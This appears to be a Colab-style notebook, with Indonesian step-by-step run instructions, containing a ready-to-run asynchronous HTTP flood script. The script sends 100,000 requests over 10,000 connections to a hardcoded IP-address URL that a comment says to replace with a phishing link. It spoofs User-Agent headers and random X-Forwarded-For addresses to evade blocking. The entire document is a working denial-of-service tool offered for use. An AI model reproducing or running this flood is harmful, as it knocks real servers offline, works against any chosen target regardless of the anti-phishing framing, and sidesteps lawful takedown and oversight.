pencet run di bawah untuk install library dulu

In [ ]:
pip install aiohttp fake-useragent nest_asyncio

pencet run di bawah untuk run requestnya

In [ ]:
import asyncio
import aiohttp
import time
import random
from fake_useragent import UserAgent
import nest_asyncio

nest_asyncio.apply()

# Target
URL = "http://139.99.61.184/~bansosp5/"  # Ganti dengan link phising
CONNECTIONS = 10000
REQUESTS = 100000

ua = UserAgent()

# IP Generator — hindari reserved ranges
def random_ip():
    while True:
        ip = [random.randint(1, 254) for _ in range(4)]
        if ip[0] in [10, 127, 172, 192, 169, 0, 224, 240]:
            continue
        return ".".join(map(str, ip))

# Fungsi request dengan header spoof
async def fetch(session):
    start = time.time()
    try:
        headers = {
            "User-Agent": ua.random,
            "X-Forwarded-For": random_ip(),
            "Referer": URL,
            "Accept": "*/*",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.9",
            "Cache-Control": "no-cache",
            "Pragma": "no-cache",
            "Connection": "keep-alive",
            "DNT": "1",
        }
        async with session.get(URL, headers=headers, timeout=12) as response:
            duration = time.time() - start
            print(f"✅ {response.status} in {duration:.2f}s", end=' ')
            if response.status != 200:
                print(f"⚠️ {response.status}", end=' ')
    except Exception as e:
        duration = time.time() - start
        print(f"\n❌ {type(e).__name__} after {duration:.2f}s", end=' ')

# Main flood loop
async def main():
    connector = aiohttp.TCPConnector(limit=CONNECTIONS, limit_per_host=CONNECTIONS)
    async with aiohttp.ClientSession(connector=connector) as session:
        tasks = []
        for i in range(REQUESTS):
            tasks.append(fetch(session))
            if len(tasks) % 1000 == 0:
                await asyncio.gather(*tasks)
                tasks = []
        if tasks:
            await asyncio.gather(*tasks)

# Jalankan
start = time.time()
await main()
print(f"\n✅ Selesai dalam {time.time() - start:.2f} detik")